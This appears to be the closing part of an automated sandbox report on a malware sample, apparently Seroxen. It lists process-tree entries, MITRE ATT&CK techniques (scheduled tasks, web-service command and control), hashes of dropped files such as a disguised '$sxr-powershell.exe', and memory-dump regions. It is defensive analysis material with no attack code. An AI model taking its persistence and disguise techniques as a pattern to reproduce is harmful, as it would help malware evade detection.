                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:1644
                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                        1⤵
                                                                                                          PID:636
                                                                                                        • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                          "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                          1⤵
                                                                                                            PID:3412
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                            1⤵
                                                                                                              PID:4700

                                                                                                            Network

                                                                                                            MITRE ATT&CK Matrix ATT&CK v13

                                                                                                            Execution

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Persistence

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Privilege Escalation

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Command and Control

                                                                                                            Web Service

                                                                                                            1
                                                                                                            T1102

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                              Filesize

                                                                                                              162KB

                                                                                                              MD5

                                                                                                              152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                              SHA1

                                                                                                              c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                              SHA256

                                                                                                              a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                              SHA512

                                                                                                              2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                            • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                                              Filesize

                                                                                                              409KB

                                                                                                              MD5

                                                                                                              7417c8c73e614f293152575f46134216

                                                                                                              SHA1

                                                                                                              cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

                                                                                                              SHA256

                                                                                                              00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

                                                                                                              SHA512

                                                                                                              897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

                                                                                                            • C:\Windows\Temp\__PSScriptPolicyTest_ulxrfzte.kek.ps1
                                                                                                              Filesize

                                                                                                              60B

                                                                                                              MD5

                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                              SHA1

                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                              SHA256

                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                              SHA512

                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
                                                                                                              Filesize

                                                                                                              412B

                                                                                                              MD5

                                                                                                              4fbd4d87af338fa7b3d43a611231603e

                                                                                                              SHA1

                                                                                                              0588e60b8c334785ef21e346bdca446e5f38464b

                                                                                                              SHA256

                                                                                                              e9d08ab02bf535211eb0583061c47b4276bd866b639f06137993e7fc6d11e186

                                                                                                              SHA512

                                                                                                              63f6396ce7e153f48733d3649dbbc8f193e4121de68f7b9c1088566e3559abd71fcb8b320c4e4b1c2c86a4862f9cb2e8b77f610feea491a0e41f372e7f7dcaa4

                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                              SHA1

                                                                                                              445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                              SHA256

                                                                                                              3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                              SHA512

                                                                                                              42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                              Filesize

                                                                                                              332B

                                                                                                              MD5

                                                                                                              7797053c50e2dc8a7a685359cb724b3b

                                                                                                              SHA1

                                                                                                              3c19b667e3277e1275779709f6da6769c3d9d688

                                                                                                              SHA256

                                                                                                              57975687d822833ecb3ffd00e81e8c1b90f5c4463ce6ca7cd3a957a50054a5be

                                                                                                              SHA512

                                                                                                              639bce4423e77f0e0dc8570efe010cdd96b6bb334e519c4f1df6e8e4f3d6aee5f6c1041c15c08279f6748ad6dca997e2e5e610956904e5b66f9088a33a94b5f9

                                                                                                            • memory/60-96-0x00000211E95E0000-0x00000211E960B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/60-102-0x00000211E95E0000-0x00000211E960B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/60-103-0x00007FFF3CA30000-0x00007FFF3CA40000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/512-107-0x00000159C3CD0000-0x00000159C3CFB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/616-69-0x0000023906530000-0x000002390655B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/616-70-0x00007FFF3CA30000-0x00007FFF3CA40000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/616-63-0x0000023906530000-0x000002390655B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/616-61-0x0000023906500000-0x0000023906525000-memory.dmp
                                                                                                              Filesize

                                                                                                              148KB

                                                                                                            • memory/616-62-0x0000023906530000-0x000002390655B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/676-80-0x000001CED9960000-0x000001CED998B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/676-81-0x00007FFF3CA30000-0x00007FFF3CA40000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/676-74-0x000001CED9960000-0x000001CED998B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/948-91-0x0000022962DA0000-0x0000022962DCB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/948-92-0x00007FFF3CA30000-0x00007FFF3CA40000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/948-85-0x0000022962DA0000-0x0000022962DCB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/1080-35-0x0000000006330000-0x000000000633A000-memory.dmp
                                                                                                              Filesize

                                                                                                              40KB

                                                                                                            • memory/1080-1317-0x0000000074D30000-0x00000000754E0000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.7MB

                                                                                                            • memory/1080-1316-0x0000000074D30000-0x00000000754E0000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.7MB

                                                                                                            • memory/1080-13-0x0000000074D30000-0x00000000754E0000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.7MB

                                                                                                            • memory/1080-14-0x0000000074D30000-0x00000000754E0000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.7MB

                                                                                                            • memory/1724-6-0x0000000005CC0000-0x0000000005CD2000-memory.dmp
                                                                                                              Filesize

                                                                                                              72KB

                                                                                                            • memory/1724-7-0x00000000068F0000-0x000000000692C000-memory.dmp
                                                                                                              Filesize

                                                                                                              240KB

                                                                                                            • memory/1724-1-0x0000000000C20000-0x0000000000C8C000-memory.dmp
                                                                                                              Filesize

                                                                                                              432KB

                                                                                                            • memory/1724-20-0x0000000074D30000-0x00000000754E0000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.7MB

                                                                                                            • memory/1724-2-0x0000000005CE0000-0x0000000006284000-memory.dmp
                                                                                                              Filesize

                                                                                                              5.6MB

                                                                                                            • memory/1724-3-0x0000000005730000-0x00000000057C2000-memory.dmp
                                                                                                              Filesize

                                                                                                              584KB

                                                                                                            • memory/1724-4-0x0000000074D30000-0x00000000754E0000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.7MB

                                                                                                            • memory/1724-0-0x0000000074D3E000-0x0000000074D3F000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/1724-5-0x0000000005680000-0x00000000056E6000-memory.dmp
                                                                                                              Filesize

                                                                                                              408KB

                                                                                                            • memory/3548-55-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3548-49-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3548-48-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3548-58-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3548-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3548-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3548-56-0x00007FFF7C9B0000-0x00007FFF7CBA5000-memory.dmp
                                                                                                              Filesize

                                                                                                              2.0MB

                                                                                                            • memory/3548-57-0x00007FFF7C3C0000-0x00007FFF7C47E000-memory.dmp
                                                                                                              Filesize

                                                                                                              760KB

                                                                                                            • memory/4000-45-0x00000200D7600000-0x00000200D762A000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/4000-47-0x00007FFF7C3C0000-0x00007FFF7C47E000-memory.dmp
                                                                                                              Filesize

                                                                                                              760KB

                                                                                                            • memory/4000-46-0x00007FFF7C9B0000-0x00007FFF7CBA5000-memory.dmp
                                                                                                              Filesize

                                                                                                              2.0MB

                                                                                                            • memory/4000-30-0x00000200D72B0000-0x00000200D72D2000-memory.dmp
                                                                                                              Filesize

                                                                                                              136KB